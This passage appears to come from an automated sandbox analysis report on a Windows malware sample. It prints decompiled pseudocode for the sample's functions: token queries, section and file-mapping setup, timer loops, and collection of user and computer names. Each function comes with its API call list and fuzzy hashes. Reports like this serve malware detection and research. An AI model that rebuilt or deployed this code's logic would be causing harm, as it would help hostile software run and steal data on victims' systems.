                  						NtClose(_v8);
                  					}
                  					NtClose(_v12);
                  				}
                  				return _t48;
                  			}

                  APIs
                  • NtOpenProcess.NTDLL(00000000,00000400,?,?), ref: 00DC11F0
                  • NtOpenProcessToken.NTDLL(00000000,00000008,00000000), ref: 00DC1203
                  • NtQueryInformationToken.NTDLL(00000000,00000001,00000000,00000000,00000000), ref: 00DC121F
                    • Part of subcall function 00DC75C4: RtlAllocateHeap.NTDLL(00000000,00000000,00DC5068), ref: 00DC75D0
                  • NtQueryInformationToken.NTDLL(00000000,00000001,00000000,00000000,00000000), ref: 00DC123C
                  • memcpy.NTDLL(00000000,00000000,0000001C), ref: 00DC1249
                  • NtClose.NTDLL(00000000), ref: 00DC125B
                  • NtClose.NTDLL(00000000), ref: 00DC1265
                  Memory Dump Source
                  • Source File: 00000014.00000002.469493764.0000000000DC1000.00000020.00000001.sdmp, Offset: 00DC0000, based on PE: true
                  • Associated: 00000014.00000002.469471880.0000000000DC0000.00000004.00000001.sdmp
                  • Associated: 00000014.00000002.469527134.0000000000DCC000.00000002.00000001.sdmp
                  • Associated: 00000014.00000002.469542653.0000000000DCD000.00000004.00000001.sdmp
                  • Associated: 00000014.00000002.469561184.0000000000DCF000.00000002.00000001.sdmp
                  Similarity
                  • API ID: Token$CloseInformationOpenProcessQuery$AllocateHeapmemcpy
                  • String ID:
                  • API String ID: 2575439697-0
                  • Opcode ID: b7079fdffea8b3cd080777cd360050ec363c0a5e45bd2402d2f54e78f32ce4b0
                  • Instruction ID: 4ccef696d3394f8135f88f584e317f2a76065bb356373f2e61ee550eb556496d
                  • Opcode Fuzzy Hash: b7079fdffea8b3cd080777cd360050ec363c0a5e45bd2402d2f54e78f32ce4b0
                  • Instruction Fuzzy Hash: A421F4B691022AABDB01DF95CC85EDEBFB9EB08740F144026FA04E6261D7719A409BA0
                  Uniqueness

                  Uniqueness Score: -1.00%

                  APIs
                    • Part of subcall function 7029D0D8: GetLastError.KERNEL32(00000000,00000000,00000004,70298D94,00000000,00000000,00000000,?,7029C932,00000000,00000000,702C0004,?,00000000), ref: 7029D0DD
                    • Part of subcall function 7029D0D8: SetLastError.KERNEL32(00000000,702C0050,000000FF,?,7029C932,00000000,00000000,702C0004,?,00000000), ref: 7029D17B
                  • GetACP.KERNEL32(?,?,?,?,?,?,7029E479,?,?,?,00000055,?,-00000050,?,?,00000004), ref: 702A4C7E
                  • IsValidCodePage.KERNEL32(00000000,?,?,?,?,?,?,7029E479,?,?,?,00000055,?,-00000050,?,?), ref: 702A4CA9
                  • _wcschr.LIBVCRUNTIME ref: 702A4D3D
                  • _wcschr.LIBVCRUNTIME ref: 702A4D4B
                    • Part of subcall function 7029D950: GetLocaleInfoEx.KERNELBASE(?,7029EFF6,?,20001004,00000000,00000002,?,?,7029E5E1,?,?,?,00000055,?,-00000050,?), ref: 7029D975
                  • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078,-00000050,00000000,000000D0), ref: 702A4E0C
                  Memory Dump Source
                  • Source File: 00000014.00000002.473412155.0000000070260000.00000020.00020000.sdmp, Offset: 70260000, based on PE: false
                  Similarity
                  • API ID: ErrorInfoLastLocale_wcschr$CodePageValid
                  • String ID:
                  • API String ID: 2037648569-0
                  • Opcode ID: 2cbbc679ee8ff0a4cabe77eaa890604492e91c50e1166a3a4f2c1cbcf81e0e63
                  • Instruction ID: 63153f87feca6e10452a5ac115aaa2f8104b5dd816d5b45db8f13bd917d3f945
                  • Opcode Fuzzy Hash: 2cbbc679ee8ff0a4cabe77eaa890604492e91c50e1166a3a4f2c1cbcf81e0e63
                  • Instruction Fuzzy Hash: 9071D7B3A00602AED7159F35CC46BAE77ADEF84710F10442AFD0AD7180EEB4E9618B54
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 72%
                  			E7025161B(intOrPtr* __eax, void** _a4) {
                  				int _v12;
                  				void* _v16;
                  				void* _v20;
                  				void* _v24;
                  				int _v28;
                  				int _v32;
                  				intOrPtr _v36;
                  				int _v40;
                  				int _v44;
                  				void* _v48;
                  				void* __esi;
                  				long _t34;
                  				void* _t39;
                  				void* _t47;
                  				intOrPtr* _t48;
                  
                  				_t48 = __eax;
                  				asm("stosd");
                  				asm("stosd");
                  				asm("stosd");
                  				asm("stosd");
                  				asm("stosd");
                  				asm("stosd");
                  				_v24 =  *((intOrPtr*)(__eax + 4));
                  				_v16 = 0;
                  				_v12 = 0;
                  				_v48 = 0x18;
                  				_v44 = 0;
                  				_v36 = 0x40;
                  				_v40 = 0;
                  				_v32 = 0;
                  				_v28 = 0;
                  				_t34 = NtCreateSection( &_v16, 0xf001f,  &_v48,  &_v24,  *(__eax + 8), 0x8000000, 0);
                  				if(_t34 < 0) {
                  					_t47 =  *((intOrPtr*)(_t48 + 0x18))(_t34);
                  				} else {
                  					 *_t48 = _v16;
                  					_t39 = E702515D9(_t48,  &_v12); // executed
                  					_t47 = _t39;
                  					if(_t47 != 0) {
                  						 *((intOrPtr*)(_t48 + 0x1c))(_v16);
                  					} else {
                  						memset(_v12, 0, _v24);
                  						 *_a4 = _v12;
                  					}
                  				}
                  				return _t47;
                  			}

                  APIs
                  • NtCreateSection.NTDLL(00000002,000F001F,?,?,?,08000000,00000000,74B04EE0,00000000,00000000,00000002), ref: 70251678
                    • Part of subcall function 702515D9: NtMapViewOfSection.NTDLL(00000000,000000FF,?,00000000,00000000,?,7025168D,00000002,00000000,?,?,00000000,?,?,7025168D,?), ref: 70251606
                  • memset.NTDLL ref: 7025169A
                  Strings
                  Memory Dump Source
                  • Source File: 00000014.00000002.473300210.0000000070251000.00000020.00020000.sdmp, Offset: 70250000, based on PE: true
                  • Associated: 00000014.00000002.473286168.0000000070250000.00000002.00020000.sdmp
                  • Associated: 00000014.00000002.473313989.0000000070253000.00000002.00020000.sdmp
                  • Associated: 00000014.00000002.473328379.0000000070255000.00000004.00020000.sdmp
                  • Associated: 00000014.00000002.473359976.0000000070256000.00000002.00020000.sdmp
                  Similarity
                  • API ID: Section$CreateViewmemset
                  • String ID: @
                  • API String ID: 2533685722-2766056989
                  • Opcode ID: 2d92a1d77e074ed22cb8003e12d9637ed81339819b621d5ff0ac7384ed7c868c
                  • Instruction ID: b3246d88dc740369731fba2dcee3a1dc018f47ab81a021c63c11c10121ccbdc5
                  • Opcode Fuzzy Hash: 2d92a1d77e074ed22cb8003e12d9637ed81339819b621d5ff0ac7384ed7c868c
                  • Instruction Fuzzy Hash: E8210BB6E00209AFCB01DFA9C8849DFFBB9FB48354F144569E506F3210D734AA588FA4
                  Uniqueness

                  Uniqueness Score: -1.00%

                  APIs
                  • GetLocaleInfoEx.KERNELBASE(?,7029EFF6,?,20001004,00000000,00000002,?,?,7029E5E1,?,?,?,00000055,?,-00000050,?), ref: 7029D975
                  • GetLocaleInfoW.KERNEL32(00000000,?,00000000,?,-00000050,?,?,?,7029EFF6,?,20001004,00000000,00000002,?,?,7029E5E1), ref: 7029D984
                  Memory Dump Source
                  • Source File: 00000014.00000002.473412155.0000000070260000.00000020.00020000.sdmp, Offset: 70260000, based on PE: false
                  Similarity
                  • API ID: InfoLocale
                  • String ID:
                  • API String ID: 2299586839-0
                  • Opcode ID: f49278dc46b49e4b84ee6b4ade1d8ae445293add30592abcb4ed650eb7b1ed4f
                  • Instruction ID: 215ab4d9b30eb16e9f2a86b75ab42214cbbbf1703ddc3a09930c7dd29f354265
                  • Opcode Fuzzy Hash: f49278dc46b49e4b84ee6b4ade1d8ae445293add30592abcb4ed650eb7b1ed4f
                  • Instruction Fuzzy Hash: 33E01A77510118BBDB122F61CC09F9E3A29FB44751F104010FC0B761648B329931BAA8
                  Uniqueness

                  Uniqueness Score: -1.00%

                  APIs
                  • EnumSystemLocalesEx.KERNELBASE ref: 7029D825
                  Memory Dump Source
                  • Source File: 00000014.00000002.473412155.0000000070260000.00000020.00020000.sdmp, Offset: 70260000, based on PE: false
                  Similarity
                  • API ID: EnumLocalesSystem
                  • String ID:
                  • API String ID: 2099609381-0
                  • Opcode ID: c30cb98ab9e8ccbe8938f0f9c680bd9cc351964ab0dc51d797f835084a613903
                  • Instruction ID: 47ecf07d23e0f17f01206294b48723d22bd0349598ce5fb748afb8611dc9e814
                  • Opcode Fuzzy Hash: c30cb98ab9e8ccbe8938f0f9c680bd9cc351964ab0dc51d797f835084a613903
                  • Instruction Fuzzy Hash: F3F0F97B80011DABCB02EF94C808ADE7BB8EB48250F004566AA16A6151EB74A625DFD4
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 68%
                  			E702515D9(void** __esi, PVOID* _a4) {
                  				long _v8;
                  				void* _v12;
                  				void* _v16;
                  				long _t13;
                  
                  				_v16 = 0;
                  				asm("stosd");
                  				_v8 = 0;
                  				_t13 = NtMapViewOfSection( *__esi, 0xffffffff, _a4, 0, 0,  &_v16,  &_v8, 2, 0, __esi[2]);
                  				if(_t13 < 0) {
                  					_push(_t13);
                  					return __esi[6]();
                  				}
                  				return 0;
                  			}

                  APIs
                  • NtMapViewOfSection.NTDLL(00000000,000000FF,?,00000000,00000000,?,7025168D,00000002,00000000,?,?,00000000,?,?,7025168D,?), ref: 70251606
                  Memory Dump Source
                  • Source File: 00000014.00000002.473300210.0000000070251000.00000020.00020000.sdmp, Offset: 70250000, based on PE: true
                  • Associated: 00000014.00000002.473286168.0000000070250000.00000002.00020000.sdmp
                  • Associated: 00000014.00000002.473313989.0000000070253000.00000002.00020000.sdmp
                  • Associated: 00000014.00000002.473328379.0000000070255000.00000004.00020000.sdmp
                  • Associated: 00000014.00000002.473359976.0000000070256000.00000002.00020000.sdmp
                  Similarity
                  • API ID: SectionView
                  • String ID:
                  • API String ID: 1323581903-0
                  • Opcode ID: 5dd26fff624a50198c0bd826f45a2e4ef6e885f587514f0e64cb0fed618db76f
                  • Instruction ID: 06686b75655befdbbd666d50df5a4ae892e4d41f91e38e91e47af8f90e9edb0b
                  • Opcode Fuzzy Hash: 5dd26fff624a50198c0bd826f45a2e4ef6e885f587514f0e64cb0fed618db76f
                  • Instruction Fuzzy Hash: AFF037B690020CFFDB119FA5CC85C9FBBBDEB44354B104979F152E1190D6709E1C9B60
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Memory Dump Source
                  • Source File: 00000014.00000002.473412155.0000000070260000.00000020.00020000.sdmp, Offset: 70260000, based on PE: false
                  Similarity
                  • API ID: ErrorInfoLastLocaleProcess_free$CurrentFeaturePresentProcessorTerminate
                  • String ID:
                  • API String ID: 2654153487-0
                  • Opcode ID: 1f5b67d76b76583702532c83433d11ad5a26db6a953336e68cd4650725b09864
                  • Instruction ID: a2364358dc38bab294e0ddeda8fce48c1ce50c6345c0dfac21143750ea64ccff
                  • Opcode Fuzzy Hash: 1f5b67d76b76583702532c83433d11ad5a26db6a953336e68cd4650725b09864
                  • Instruction Fuzzy Hash: 9DB1D2B75003428FD7299F25CC82BAFB3A9EB85308F50456DEE4386580EEB4F965CB10
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 82%
                  			E00DC37CA(intOrPtr __edx, intOrPtr _a4, intOrPtr _a8) {
                  				struct %anon52 _v8;
                  				long _v12;
                  				char _v16;
                  				char _v20;
                  				signed int _v24;
                  				intOrPtr _v32;
                  				union _LARGE_INTEGER _v36;
                  				intOrPtr _v40;
                  				void* _v44;
                  				void _v88;
                  				char _v92;
                  				struct %anon52 _t46;
                  				intOrPtr _t51;
                  				long _t53;
                  				void* _t54;
                  				struct %anon52 _t61;
                  				long _t65;
                  				signed int _t66;
                  				void* _t71;
                  				signed int _t72;
                  				intOrPtr _t74;
                  				intOrPtr _t76;
                  				void** _t78;
                  				void* _t80;
                  
                  				_t74 = __edx;
                  				_v92 = 0;
                  				memset( &_v88, 0, 0x2c);
                  				_t46 = CreateWaitableTimerA(0, 1, 0);
                  				_v44 = _t46;
                  				if(_t46 == 0) {
                  					_v8.LowPart = GetLastError();
                  				} else {
                  					_push(0xffffffff);
                  					_push(0xff676980);
                  					_push(0);
                  					_push( *0xdcd1f8);
                  					_v20 = 0;
                  					_v16 = 0;
                  					L00DCAEE0();
                  					_v36.LowPart = _t46;
                  					_v32 = _t74;
                  					SetWaitableTimer(_v44,  &_v36, 0, 0, 0, 0);
                  					_t51 =  *0xdcd224; // 0x328
                  					_v40 = _t51;
                  					_t53 = WaitForMultipleObjects(2,  &_v44, 0, 0xffffffff);
                  					_v8.LowPart = _t53;
                  					if(_t53 == 0) {
                  						if(_a8 != 0 || E00DC4C46() != 0) {
                  							 *0xdcd204 = 5;
                  						}
                  						_v12 = 0;
                  						L6:
                  						L6:
                  						if(_v12 == 1 && ( *0xdcd218 & 0x00000001) == 0) {
                  							_v12 = 2;
                  						}
                  						_t72 = _v12;
                  						_t58 = _t72 << 4;
                  						_t76 = _t80 + (_t72 << 4) - 0x54;
                  						_t73 = _t72 + 1;
                  						_v24 = _t72 + 1;
                  						_t61 = E00DC80F6( &_v20, _t73, _t73, _t80 + _t58 - 0x58, _t76,  &_v16);
                  						_v8.LowPart = _t61;
                  						if(_t61 != 0) {
                  							goto L17;
                  						}
                  						_t66 = _v24;
                  						_t90 = _t66 - 3;
                  						_v12 = _t66;
                  						if(_t66 != 3) {
                  							goto L6;
                  						} else {
                  							_v8.LowPart = E00DC53BE(_t73, _t90,  &_v92, _a4, _a8);
                  						}
                  						goto L12;
                  						L17:
                  						__eflags = _t61 - 0x10d2;
                  						if(_t61 != 0x10d2) {
                  							_push(0xffffffff);
                  							_push(0xff676980);
                  							_push(0);
                  							_push( *0xdcd1fc);
                  							goto L21;
                  						} else {
                  							__eflags =  *0xdcd200; // 0x1
                  							if(__eflags == 0) {
                  								goto L12;
                  							} else {
                  								_t61 = E00DC53A8();
                  								_push(0xffffffff);
                  								_push(0xdc3cba00);
                  								_push(0);
                  								_push( *0xdcd200);
                  								L21:
                  								L00DCAEE0();
                  								_v36.LowPart = _t61;
                  								_v32 = _t76;
                  								SetWaitableTimer(_v44,  &_v36, 0, 0, 0, 0);
                  								_t65 = WaitForMultipleObjects(2,  &_v44, 0, 0xffffffff);
                  								__eflags = _t65;
                  								_v8.LowPart = _t65;
                  								if(_t65 == 0) {
                  									goto L6;
                  								} else {
                  									goto L12;
                  								}
                  							}
                  						}
                  						L25:
                  					}
                  					L12:
                  					_t78 =  &_v92;
                  					_t71 = 3;
                  					do {
                  						_t54 =  *_t78;
                  						if(_t54 != 0) {
                  							HeapFree( *0xdcd1f0, 0, _t54);
                  						}
                  						_t78 =  &(_t78[4]);
                  						_t71 = _t71 - 1;
                  					} while (_t71 != 0);
                  					CloseHandle(_v44);
                  				}
                  				return _v8;
                  				goto L25;
                  			}

                  APIs
                  • memset.NTDLL ref: 00DC37DF
                  • CreateWaitableTimerA.KERNEL32(00000000,00000001,00000000), ref: 00DC37EB
                  • _allmul.NTDLL(00000000,FF676980,000000FF), ref: 00DC3810
                  • SetWaitableTimer.KERNELBASE(?,?,00000000,00000000,00000000,00000000), ref: 00DC382C
                  • WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF), ref: 00DC3845
                  • HeapFree.KERNEL32(00000000,00000000), ref: 00DC38DA
                  • CloseHandle.KERNEL32(?), ref: 00DC38E9
                  • _allmul.NTDLL(00000000,FF676980,000000FF,00000002), ref: 00DC3923
                  • SetWaitableTimer.KERNEL32(?,?,00000000,00000000,00000000,00000000,00000000,FF676980,000000FF,00000002,?,?,00DC7A05), ref: 00DC3939
                  • WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF), ref: 00DC3944
                    • Part of subcall function 00DC4C46: HeapFree.KERNEL32(00000000,00000000,?,80000001,00000000,00680043,05119360,?,00000000,30314549,00000014,004F0053,0511931C), ref: 00DC4D32
                    • Part of subcall function 00DC4C46: HeapFree.KERNEL32(00000000,?,?,?,?,?,?,?,00DC3858), ref: 00DC4D44
                  • GetLastError.KERNEL32 ref: 00DC3956
                  Memory Dump Source
                  • Source File: 00000014.00000002.469493764.0000000000DC1000.00000020.00000001.sdmp, Offset: 00DC0000, based on PE: true
                  • Associated: 00000014.00000002.469471880.0000000000DC0000.00000004.00000001.sdmp
                  • Associated: 00000014.00000002.469527134.0000000000DCC000.00000002.00000001.sdmp
                  • Associated: 00000014.00000002.469542653.0000000000DCD000.00000004.00000001.sdmp
                  • Associated: 00000014.00000002.469561184.0000000000DCF000.00000002.00000001.sdmp
                  Similarity
                  • API ID: FreeHeapTimerWaitable$MultipleObjectsWait_allmul$CloseCreateErrorHandleLastmemset
                  • String ID:
                  • API String ID: 3521023985-0
                  • Opcode ID: c7628cadf03249355b3e7aed8b982878c8774b29765cf1af2e96e52da2b9c9f0
                  • Instruction ID: 0345acff1e379d09a6b76d6670135ab566e478c847c4e8bcf847ec7ea14261a3
                  • Opcode Fuzzy Hash: c7628cadf03249355b3e7aed8b982878c8774b29765cf1af2e96e52da2b9c9f0
                  • Instruction Fuzzy Hash: 84513A7190122BAADF10DF95DC44EEEBBB9EF09364F24812AF515E3294D7709A40DBB0
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 64%
                  			E00DC77EB(signed int __edx) {
                  				signed int _v8;
                  				long _v12;
                  				signed int _v16;
                  				long _v20;
                  				void* _v24;
                  				intOrPtr _v28;
                  				intOrPtr _v32;
                  				intOrPtr _v36;
                  				char _v40;
                  				void* __edi;
                  				void* __esi;
                  				void* _t27;
                  				long _t28;
                  				long _t31;
                  				intOrPtr _t32;
                  				void* _t36;
                  				signed int _t37;
                  				intOrPtr _t38;
                  				void* _t39;
                  				CHAR* _t42;
                  				long _t48;
                  				long _t49;
                  				void* _t54;
                  				void* _t56;
                  				intOrPtr _t64;
                  				void* _t67;
                  				long _t71;
                  				void* _t72;
                  				signed char _t74;
                  				intOrPtr _t76;
                  				signed int _t77;
                  				long _t82;
                  				long _t84;
                  				CHAR* _t87;
                  				void* _t88;
                  
                  				_t79 = __edx;
                  				_v16 = 0;
                  				_v8 = 0;
                  				_v12 = 0;
                  				_t27 = E00DC8B76();
                  				if(_t27 != 0) {
                  					_t77 =  *0xdcd214; // 0x4000000a
                  					_t73 = (_t77 & 0xf0000000) + _t27;
                  					 *0xdcd214 = (_t77 & 0xf0000000) + _t27;
                  				}
                  				_t28 =  *0xdcd134(0, 2); // executed
                  				_v20 = _t28;
                  				if(_t28 == 0 || _t28 == 1 || _t28 == 0x80010106) {
                  					_t31 = E00DC82D9( &_v8,  &_v16); // executed
                  					_push(0);
                  					_t84 = _t31;
                  					_t32 =  *0xdcd230; // 0x434a5a8
                  					_push("h�T");
                  					_push(1);
                  					_t7 = _t32 + 0xdce5bc; // 0x4d283a53
                  					 *0xdcd234 = 0xc;
                  					 *0xdcd23c = 0;
                  					L00DC73FE();
                  					_t36 = E00DC12E8(_t79,  &_v24,  &_v12); // executed
                  					if(_t36 == 0) {
                  						CloseHandle(_v24);
                  					}
                  					if(_t84 != 5) {
                  						_t37 = _v16;
                  						__eflags = _t37;
                  						if(_t37 != 0) {
                  							E00DCA12A(_t37 ^ 0xe8fa7dd7,  &_v40);
                  							_t87 = E00DC75C4(0x27);
                  							__eflags = _t87;
                  							if(_t87 != 0) {
                  								asm("bswap eax");
                  								asm("bswap eax");
                  								asm("bswap eax");
                  								asm("bswap eax");
                  								_t64 =  *0xdcd230; // 0x434a5a8
                  								_t18 = _t64 + 0xdce916; // 0x78383025
                  								wsprintfA(_t87, _t18, _v40, _v36, _v32, _v28);
                  								_t88 = _t88 + 0x18;
                  							}
                  							 *0xdcd288 = _t87;
                  						}
                  						_t38 = E00DCA667();
                  						 *0xdcd228 =  *0xdcd228 ^ 0xe8fa7dd7;
                  						 *0xdcd278 = _t38;
                  						_t39 = E00DC75C4(0x60);
                  						__eflags = _t39;
                  						 *0xdcd2dc = _t39;
                  						if(_t39 == 0) {
                  							_t84 = 8;
                  						} else {
                  							memset(_t39, 0, 0x60);
                  							_t54 =  *0xdcd2dc; // 0x5119630
                  							_t88 = _t88 + 0xc;
                  							__imp__(_t54 + 0x40);
                  							_t56 =  *0xdcd2dc; // 0x5119630
                  							 *_t56 = 0xdce882;
                  							_t84 = 0;
                  						}
                  						__eflags = _t84;
                  						if(_t84 == 0) {
                  							_t42 = RtlAllocateHeap( *0xdcd1f0, _t84, 0x52);
                  							__eflags = _t42;
                  							 *0xdcd270 = _t42;
                  							if(_t42 == 0) {
                  								_t84 = 8;
                  							} else {
                  								_t74 =  *0xdcd214; // 0x4000000a
                  								_t79 = _t74 & 0x000000ff;
                  								_t76 =  *0xdcd230; // 0x434a5a8
                  								_t19 = _t76 + 0xdce212; // 0x697a6f4d
                  								_t73 = _t19;
                  								wsprintfA(_t42, _t19, _t74 & 0x000000ff, _t74 & 0x000000ff, 0xdcc2bf);
                  							}
                  							__eflags = _t84;
                  							if(_t84 == 0) {
                  								asm("sbb eax, eax");
                  								E00DCA12A( ~_v8 &  *0xdcd228, 0xdcd00c); // executed
                  								_t84 = E00DC58CA(_t73);
                  								__eflags = _t84;
                  								if(_t84 != 0) {
                  									goto L31;
                  								}
                  								_t48 = E00DC7098(_t73); // executed
                  								__eflags = _t48;
                  								if(_t48 != 0) {
                  									__eflags = _v8;
                  									_t82 = _v12;
                  									if(_v8 != 0) {
                  										L30:
                  										_t49 = E00DC37CA(_t79, _t82, _v8); // executed
                  										_t84 = _t49;
                  										goto L31;
                  									}
                  									__eflags = _t82;
                  									if(__eflags == 0) {
                  										goto L31;
                  									}
                  									_t23 = _t82 + 4; // 0x5
                  									_t84 = E00DC8BA5(__eflags, _t23);
                  									__eflags = _t84;
                  									if(_t84 == 0) {
                  										goto L31;
                  									}
                  									goto L30;
                  								}
                  								_t84 = 8;
                  							}
                  						}
                  					} else {
                  						_t71 = _v12;
                  						if(_t71 == 0) {
                  							L31:
                  							if(_v20 == 0 || _v20 == 1) {
                  								 *0xdcd130();
                  							}
                  							goto L35;
                  						}
                  						_t72 = _t71 + 4;
                  						do {
                  							_push(1);
                  							_push(_t72);
                  							_t67 = 5;
                  						} while (E00DC3267(_t67, 0) == 0x4c7);
                  					}
                  					goto L31;
                  				} else {
                  					_t84 = _t28;
                  					L35:
                  					return _t84;
                  				}
                  			}

                  APIs
                    • Part of subcall function 00DC8B76: GetModuleHandleA.KERNEL32(4C44544E,00000000,00DC7804,00000000,00000000,00000000,?,?,?,?,?,00DC87DD,?,00000001), ref: 00DC8B85
                  • ConvertStringSecurityDescriptorToSecurityDescriptorA.ADVAPI32(4D283A53,00000001,hT,00000000), ref: 00DC786F
                  • CloseHandle.KERNEL32(?,?,00000001,?,?,?,?,?,?,?,00DC87DD,?,00000001), ref: 00DC7888
                  • wsprintfA.USER32 ref: 00DC7908
                  • memset.NTDLL ref: 00DC7938
                  • RtlInitializeCriticalSection.NTDLL(051195F0), ref: 00DC7949
                  • RtlAllocateHeap.NTDLL(00000008,00000052,00000060), ref: 00DC7972
                  • wsprintfA.USER32 ref: 00DC79A2
                    • Part of subcall function 00DCA12A: GetUserNameW.ADVAPI32(00000000,00DC79C7), ref: 00DCA161
                    • Part of subcall function 00DCA12A: RtlAllocateHeap.NTDLL(00000000,00DC79C7), ref: 00DCA178
                    • Part of subcall function 00DCA12A: GetUserNameW.ADVAPI32(00000000,00DC79C7), ref: 00DCA185
                    • Part of subcall function 00DCA12A: HeapFree.KERNEL32(00000000,00000000,?,?,?,?,?,00DC79C7,?,?,?,?,?,00DC87DD,?,00000001), ref: 00DCA1A6
                    • Part of subcall function 00DCA12A: GetComputerNameW.KERNEL32(00000000,00000000), ref: 00DCA1CD
                    • Part of subcall function 00DCA12A: RtlAllocateHeap.NTDLL(00000000,00000000), ref: 00DCA1E1
                    • Part of subcall function 00DCA12A: GetComputerNameW.KERNEL32(00000000,00000000), ref: 00DCA1EE
                    • Part of subcall function 00DCA12A: HeapFree.KERNEL32(00000000,00000000), ref: 00DCA20C
                    • Part of subcall function 00DC75C4: RtlAllocateHeap.NTDLL(00000000,00000000,00DC5068), ref: 00DC75D0
                  Strings
                  Memory Dump Source
                  • Source File: 00000014.00000002.469493764.0000000000DC1000.00000020.00000001.sdmp, Offset: 00DC0000, based on PE: true
                  • Associated: 00000014.00000002.469471880.0000000000DC0000.00000004.00000001.sdmp
                  • Associated: 00000014.00000002.469527134.0000000000DCC000.00000002.00000001.sdmp
                  • Associated: 00000014.00000002.469542653.0000000000DCD000.00000004.00000001.sdmp
                  • Associated: 00000014.00000002.469561184.0000000000DCF000.00000002.00000001.sdmp
                  Similarity
                  • API ID: Heap$AllocateName$ComputerDescriptorFreeHandleSecurityUserwsprintf$CloseConvertCriticalInitializeModuleSectionStringmemset
                  • String ID: hT
                  • API String ID: 2910951584-303261386
                  • Opcode ID: 37b4a479b9f80f9343fde471e90bfab747301cc8fbc20d7c337a05286e0e6cfd
                  • Instruction ID: 6d6ec3b793561ed88dca38fa0d6c8c6fc949e1e104eb57ea9a76de6201b892ba
                  • Opcode Fuzzy Hash: 37b4a479b9f80f9343fde471e90bfab747301cc8fbc20d7c337a05286e0e6cfd
                  • Instruction Fuzzy Hash: 3F51B171944217ABDB21DBA8DC45FAEB7A9EB04710F18052DE909E7290DB70DE019FB4
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 69%
                  			E70251470(intOrPtr __edx, long _a4, void** _a8, void** _a12) {
                  				intOrPtr _v12;
                  				struct _FILETIME* _v16;
                  				short _v60;
                  				struct _FILETIME* _t14;
                  				intOrPtr _t15;
                  				long _t18;
                  				void* _t19;
                  				void* _t22;
                  				intOrPtr _t31;
                  				long _t32;
                  				void* _t34;
                  
                  				_t31 = __edx;
                  				_t14 =  &_v16;
                  				GetSystemTimeAsFileTime(_t14);
                  				_push(0x192);
                  				_push(0x54d38000);
                  				_push(_v12);
                  				_push(_v16);
                  				L70252150();
                  				_push(_t14);
                  				_v16 = _t14;
                  				_t15 =  *0x70254150;
                  				_push(_t15 + 0x7025505e);
                  				_push(_t15 + 0x70255054);
                  				_push(0x16);
                  				_push( &_v60);
                  				_v12 = _t31;
                  				L7025214A();
                  				_t18 = _a4;
                  				if(_t18 == 0) {
                  					_t18 = 0x1000;
                  				}
                  				_t19 = CreateFileMappingW(0xffffffff, 0x70254140, 4, 0, _t18,  &_v60); // executed
                  				_t34 = _t19;
                  				if(_t34 == 0) {
                  					_t32 = GetLastError();
                  				} else {
                  					if(_a4 != 0 || GetLastError() == 0xb7) {
                  						_t22 = MapViewOfFile(_t34, 6, 0, 0, 0); // executed
                  						if(_t22 == 0) {
                  							_t32 = GetLastError();
                  							if(_t32 != 0) {
                  								goto L9;
                  							}
                  						} else {
                  							 *_a8 = _t34;
                  							 *_a12 = _t22;
                  							_t32 = 0;
                  						}
                  					} else {
                  						_t32 = 2;
                  						L9:
                  						CloseHandle(_t34);
                  					}
                  				}
                  				return _t32;
                  			}

                  APIs
                  • GetSystemTimeAsFileTime.KERNEL32(?,00000002,?,?,?,?,?,?,?,?,?,?,?,70251F0B,0000000A,?), ref: 7025147D
                  • _aulldiv.NTDLL(?,?,54D38000,00000192), ref: 70251493
                  • _snwprintf.NTDLL ref: 702514B8
                  • CreateFileMappingW.KERNELBASE(000000FF,70254140,00000004,00000000,?,?), ref: 702514DD
                  • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,70251F0B,0000000A), ref: 702514F4
                  • MapViewOfFile.KERNELBASE(00000000,00000006,00000000,00000000,00000000), ref: 70251508
                  • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,70251F0B,0000000A), ref: 70251520
                  • CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,70251F0B), ref: 70251529
                  • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,70251F0B,0000000A), ref: 70251531
                  Memory Dump Source
                  • Source File: 00000014.00000002.473300210.0000000070251000.00000020.00020000.sdmp, Offset: 70250000, based on PE: true
                  • Associated: 00000014.00000002.473286168.0000000070250000.00000002.00020000.sdmp
                  • Associated: 00000014.00000002.473313989.0000000070253000.00000002.00020000.sdmp
                  • Associated: 00000014.00000002.473328379.0000000070255000.00000004.00020000.sdmp
                  • Associated: 00000014.00000002.473359976.0000000070256000.00000002.00020000.sdmp
                  Similarity
                  • API ID: ErrorFileLast$Time$CloseCreateHandleMappingSystemView_aulldiv_snwprintf
                  • String ID:
                  • API String ID: 1724014008-0
                  • Opcode ID: d344053177942dad718ae4cbb1fd9972736607c976d3ed695f7d1b00eca069af
                  • Instruction ID: 04fd878db8f01313424fc7af4e73dbaf2701b5b4cf63c83e3332d6c527699377
                  • Opcode Fuzzy Hash: d344053177942dad718ae4cbb1fd9972736607c976d3ed695f7d1b00eca069af
                  • Instruction Fuzzy Hash: 1E2186B3600104BFC7019FA9DC88F9E77BDEB88354F6040A5F617D7290E6709D599B68
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 74%
                  			E00DC12E8(intOrPtr __edx, void** _a4, void** _a8) {
                  				intOrPtr _v8;
                  				struct _FILETIME* _v12;
                  				short _v56;
                  				struct _FILETIME* _t12;
                  				intOrPtr _t13;
                  				void* _t17;
                  				void* _t21;
                  				intOrPtr _t27;
                  				long _t28;
                  				void* _t30;
                  
                  				_t27 = __edx;
                  				_t12 =  &_v12;
                  				GetSystemTimeAsFileTime(_t12);
                  				_push(0x192);
                  				_push(0x54d38000);
                  				_push(_v8);
                  				_push(_v12);
                  				L00DCAEDA();
                  				_push(_t12);
                  				_v12 = _t12;
                  				_t13 =  *0xdcd230; // 0x434a5a8
                  				_t5 = _t13 + 0xdce84d; // 0x5118df5
                  				_t6 = _t13 + 0xdce580; // 0x530025
                  				_push(0x16);
                  				_push( &_v56);
